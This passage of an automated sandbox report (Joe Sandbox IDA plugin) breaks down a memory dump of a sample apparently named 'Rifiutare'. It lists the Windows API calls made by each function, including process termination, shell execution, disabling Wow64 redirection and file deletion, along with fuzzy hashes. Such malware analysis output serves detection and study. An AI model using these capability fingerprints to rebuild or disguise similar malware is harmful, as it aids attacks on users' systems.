                                                                                  • Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2
                                                                                • GetSystemMetrics.USER32(00000004), ref: 00CC835E
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 2294984445-0
                                                                                • Opcode ID: 0b2163794c9307320989c8bfb29b4ce813ed9e9776e47957fb01858e3eba6f6a
                                                                                • Instruction ID: 7249fffd8c13e409a89b8877b481a555129ecdea21d0b5529a0bc79e5ddc0404
                                                                                • Opcode Fuzzy Hash: 0b2163794c9307320989c8bfb29b4ce813ed9e9776e47957fb01858e3eba6f6a
                                                                                • Instruction Fuzzy Hash: 14216971610681AFCB149F79DC08F6B3BA4FB85B25F184A2DF926C22F0DA30D954DB10
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00C53799,00C53405), ref: 00C537B0
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C537BE
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C537D7
                                                                                • SetLastError.KERNEL32(00000000,?,00C53799,00C53405), ref: 00C53829
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: e109c71b1e258ebb071f1303d85b22c1b046e5c1f5893d82fe51c7c27de24ad4
                                                                                • Instruction ID: e29801424a7afee92487f0304bc5b8b46b30c589697b5ac49a1761ad63569386
                                                                                • Opcode Fuzzy Hash: e109c71b1e258ebb071f1303d85b22c1b046e5c1f5893d82fe51c7c27de24ad4
                                                                                • Instruction Fuzzy Hash: 9801287A6097511EA62926B4BC85B2A2794EB083F3B20023AF822410F1EE114E8AB14C
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00C54E03,?,00000002,?,00C559A6,00C56714), ref: 00C63198
                                                                                • _free.LIBCMT ref: 00C631CB
                                                                                • _free.LIBCMT ref: 00C631F3
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C63200
                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C56714,00000000), ref: 00C6320C
                                                                                • _abort.LIBCMT ref: 00C63212
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: ed3aad829e4278bd0729ba0803a985bcd0cdf8b475fee914f466de3d0b0e94d8
                                                                                • Instruction ID: 4245ad20869053acd21d17a2076f431e92938ad41b522539fee1ecb3d2bd35f3
                                                                                • Opcode Fuzzy Hash: ed3aad829e4278bd0729ba0803a985bcd0cdf8b475fee914f466de3d0b0e94d8
                                                                                • Instruction Fuzzy Hash: 40F0CD3554498067C6323735ACC9F5E16699FC2770F250524F836D21A1EF25CB06A121
                                                                                APIs
                                                                                  • Part of subcall function 00C31E82: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C31EDC
                                                                                  • Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31EEB
                                                                                  • Part of subcall function 00C31E82: BeginPath.GDI32(?), ref: 00C31F02
                                                                                  • Part of subcall function 00C31E82: SelectObject.GDI32(?,00000000), ref: 00C31F2B
                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CC9056
                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00CC906A
                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CC9078
                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00CC9088
                                                                                • EndPath.GDI32(?), ref: 00CC9098
                                                                                • StrokePath.GDI32(?), ref: 00CC90A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 054fba9e78b8d63b510926f4b5625ff1ffb9a6f2a2344ad984003d8809c41fe0
                                                                                • Instruction ID: ccb7e7820d2337e845d2e264760de1e3b5dae4ad11b3b1ee11c53718fba964fd
                                                                                • Opcode Fuzzy Hash: 054fba9e78b8d63b510926f4b5625ff1ffb9a6f2a2344ad984003d8809c41fe0
                                                                                • Instruction Fuzzy Hash: B911C97200010DBFEB129F94DC88FAE7F6DEB08354F048026FA5A9A161D7729E55DBA0
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C33731
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C33739
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C33744
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C3374F
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C33757
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C3375F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 64f8c52b9afd1e87bbe9bd6bea8b7c515ff547ce7b61ce939eeb4d9de09f593b
                                                                                • Instruction ID: 5a08f2f2d17bca32a3d7e529c96aaa58146b1665d641717b4078088897bbd202
                                                                                • Opcode Fuzzy Hash: 64f8c52b9afd1e87bbe9bd6bea8b7c515ff547ce7b61ce939eeb4d9de09f593b
                                                                                • Instruction Fuzzy Hash: 7A0167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C9F307
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C9F31D
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00C9F32C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F33B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F345
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C9F34C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: b62896bde25e5dd55a1ba6ac1d82a5a3492000ac8da940651354c722b8271109
                                                                                • Instruction ID: b277c2520c7cb4c35cef511bd15696046e2483f48893ead9f5a60637bbb8abf7
                                                                                • Opcode Fuzzy Hash: b62896bde25e5dd55a1ba6ac1d82a5a3492000ac8da940651354c722b8271109
                                                                                • Instruction Fuzzy Hash: 42F03072241158BBE7215752DC0EFEF7B7CEFC6B11F040068F606D1190D7A45A02C6B5
                                                                                APIs
                                                                                • GetClientRect.USER32(?), ref: 00C730D7
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C730EE
                                                                                • GetWindowDC.USER32(?), ref: 00C730FA
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00C73109
                                                                                • ReleaseDC.USER32(?,00000000), ref: 00C7311B
                                                                                • GetSysColor.USER32(00000005), ref: 00C73135
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                • String ID:
                                                                                • API String ID: 272304278-0
                                                                                • Opcode ID: 50dd985ff54e1e4e7dd80a09e017d9bd6f8670960df1de5afb2d1cad9d5149d8
                                                                                • Instruction ID: 03e8896a574d3bac074e735ed6849fe075104aeec2b99742e2bbd2e4f245099f
                                                                                • Opcode Fuzzy Hash: 50dd985ff54e1e4e7dd80a09e017d9bd6f8670960df1de5afb2d1cad9d5149d8
                                                                                • Instruction Fuzzy Hash: 3E012472400246AFDB515BA0DC08FAEBBB5FB04321F514560FA2AA61A0CB310E51EB10
                                                                                APIs
                                                                                  • Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C9CE44
                                                                                • _wcslen.LIBCMT ref: 00C9CE8B
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C9CEF2
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C9CF20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                • String ID: 0
                                                                                • API String ID: 1227352736-4108050209
                                                                                • Opcode ID: 2c4c786bffebbdd3dc1d50f4de33744ea22649cce7d8f4756f01069aafc92c48
                                                                                • Instruction ID: 3c451f55572fd377d46f6d4551c59f91127a52b7523558003b8d330f56cf1c15
                                                                                • Opcode Fuzzy Hash: 2c4c786bffebbdd3dc1d50f4de33744ea22649cce7d8f4756f01069aafc92c48
                                                                                • Instruction Fuzzy Hash: 5D51DE726183419BDB15DF68C8CDB7B7BE8AB49310F040A2DF9A9D31D0DB70CA489B56
                                                                                APIs
                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00CBB623
                                                                                  • Part of subcall function 00C37A0C: _wcslen.LIBCMT ref: 00C37A11
                                                                                • GetProcessId.KERNEL32(00000000), ref: 00CBB6B8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CBB6E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                • String ID: <$@
                                                                                • API String ID: 146682121-1426351568
                                                                                • Opcode ID: 69d97159882a77be210ba3b0afcd7f68ad038d98ed732492d27a42bd6152b4f0
                                                                                • Instruction ID: 71b9f98c98599b8885415e77c295f63db06e26fc12ae94b77e4405e58da9c445
                                                                                • Opcode Fuzzy Hash: 69d97159882a77be210ba3b0afcd7f68ad038d98ed732492d27a42bd6152b4f0
                                                                                • Instruction Fuzzy Hash: 7B715A75A10219DFCB24DF94C584A9DBBF0FF08310F048499E85AAB3A1CB74EE45CB95
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC450F
                                                                                • IsMenu.USER32(?), ref: 00CC4524
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC456C
                                                                                • DrawMenuBar.USER32 ref: 00CC457F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                • String ID: 0
                                                                                • API String ID: 3076010158-4108050209
                                                                                • Opcode ID: 86b91b732d8bdcc9cdce61313bdeea1e39847ec480e034d8b9c2152e47b8c27c
                                                                                • Instruction ID: 8c664176a832af8b0b3f10bcf133d0f7461da4c7aee2e05b8b8e709799da9a02
                                                                                • Opcode Fuzzy Hash: 86b91b732d8bdcc9cdce61313bdeea1e39847ec480e034d8b9c2152e47b8c27c
                                                                                • Instruction Fuzzy Hash: 574106B5A01209EFDB14CF95E894FAABBB8FB05354F048129F915A7250C730EE50DFA0
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                  • Part of subcall function 00C944BB: GetClassNameW.USER32(?,?,000000FF), ref: 00C944DE
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C92666
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C92679
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C926A9
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 2081771294-1403004172
                                                                                • Opcode ID: 5171c7e813a2908881ce63fc4530294a422c9827ee4ecc1460aed49a079d7588
                                                                                • Instruction ID: febbc0db2a4953927914d3bb1967023f6c60112da6f0d30db448474f969b6c45
                                                                                • Opcode Fuzzy Hash: 5171c7e813a2908881ce63fc4530294a422c9827ee4ecc1460aed49a079d7588
                                                                                • Instruction Fuzzy Hash: DB21D6719001087FDF19AB64DC4ADFFBBA8DF45350F104129F562A75E1DB78494AA720
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CC3667
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00CC366E
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CC3683
                                                                                • DestroyWindow.USER32(?), ref: 00CC368B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 3529120543-1011021900
                                                                                • Opcode ID: 69399a454550ce6198a502c019c09f6b2d83a2d17fc78a8478a8548ba195d2d6
                                                                                • Instruction ID: 41c6d4d86f48be422fd608ebc262803e1c026ce7bc584aca57a9a890d308554b
                                                                                • Opcode Fuzzy Hash: 69399a454550ce6198a502c019c09f6b2d83a2d17fc78a8478a8548ba195d2d6
                                                                                • Instruction Fuzzy Hash: 06219A71600345BBEF105F64EC88FBB37A9FB58364F208628FA65D6290C771CE9197A0
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C5513E,00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002), ref: 00C551AD
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C551C0
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00C5513E,00000003,?,00C550DE,00000003,00CF9820,0000000C,00C55235,00000003,00000002,00000000), ref: 00C551E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: a22b6935ea617a0408d1a705d03e74a0f4f4300f7eb00cf5aa2c7c1386cd882e
                                                                                • Instruction ID: ca16c12d7a0d1207bfc76a1f82179e3eba79deeafba6e1df855a16cf9b1ac8f6
                                                                                • Opcode Fuzzy Hash: a22b6935ea617a0408d1a705d03e74a0f4f4300f7eb00cf5aa2c7c1386cd882e
                                                                                • Instruction Fuzzy Hash: 3CF04435A00608BBDB119B94DC49FAEBFB5EF44752F190075FD0BA2160CB705E84DA95
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3321A
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C3322C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00C32BF2,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C3323E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-3689287502
                                                                                • Opcode ID: 79add4a3c4aa39870071ac29e323b7246a008b780944fcc8dc1b6c70bb73c829
                                                                                • Instruction ID: a174cb744f4e430aa1de97930f2b0fb86b5166bb319861f7e5c1fb61a9925cb5
                                                                                • Opcode Fuzzy Hash: 79add4a3c4aa39870071ac29e323b7246a008b780944fcc8dc1b6c70bb73c829
                                                                                • Instruction Fuzzy Hash: 92E0C2366126221B83222715EC08F6FE6189FC2F32B090035F906E2241DF60CF4184E1
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C331E0
                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C331F2
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00C73B55,?,?,00C32B95,?,00000001,?,?,00000000), ref: 00C33205
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 145871493-1355242751
                                                                                • Opcode ID: 1feb022d9b991b64ec84985420198af4533e42a94aee1a700d808fb8f3d4d3f4
                                                                                • Instruction ID: 78d1a855dc1931c2c1f86ea51de6f00e354bdfeb8bc8652afa8de1122fae9f8b
                                                                                • Opcode Fuzzy Hash: 1feb022d9b991b64ec84985420198af4533e42a94aee1a700d808fb8f3d4d3f4
                                                                                • Instruction Fuzzy Hash: 73D05B366125715752332725FC18FDF6E14AFC1F313090035F926A2115CF29CF0585D4
                                                                                APIs
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA3496
                                                                                • DeleteFileW.KERNEL32(?), ref: 00CA3518
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CA352E
